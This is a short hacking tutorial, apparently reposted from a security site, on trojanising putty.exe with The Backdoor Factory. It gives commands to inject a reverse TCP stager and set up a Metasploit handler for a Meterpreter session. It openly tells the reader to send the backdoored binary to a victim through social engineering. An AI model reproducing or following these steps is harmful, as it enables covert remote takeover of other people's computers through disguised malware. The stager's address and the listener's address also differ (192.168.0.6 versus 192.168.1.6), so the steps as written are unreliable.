Hack Remote Windows PC using The Backdoor factory with Metasploit

Share this…

The goal of BDF is to patch executable binaries with user desired shellcode and continue normal execution of the prepatched state.

First of all download the-backdoor-factory-master from here. Now unzip the-backdoor-factory-master .zip file. And save in your desktop

Now move to the-backdoor-factory-master directory & install it.

Now download putty.exe file and check whether this binary is supported.

./backdoor.py  -f  /root/Desktop/putty.exe  –s  show

Now patch putty.exe file using existing code cave using following command.

./backdoor.py -f /root/Desktop/putty.exe -s iat_reverse_tcp_stager_threaded -H 192.168.0.6 -P 8080

Now enter selection as 3. It will show the message putty.exe is in the backdoored directory.

We can see putty.exe in backdoored directory.

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.1.6

exploit

Now send your putty.exe files to victim using any social engineering technique. Now when the victim will use putty you will get the meterpreter of victim PC.

Source:https://www.hackingarticles.in/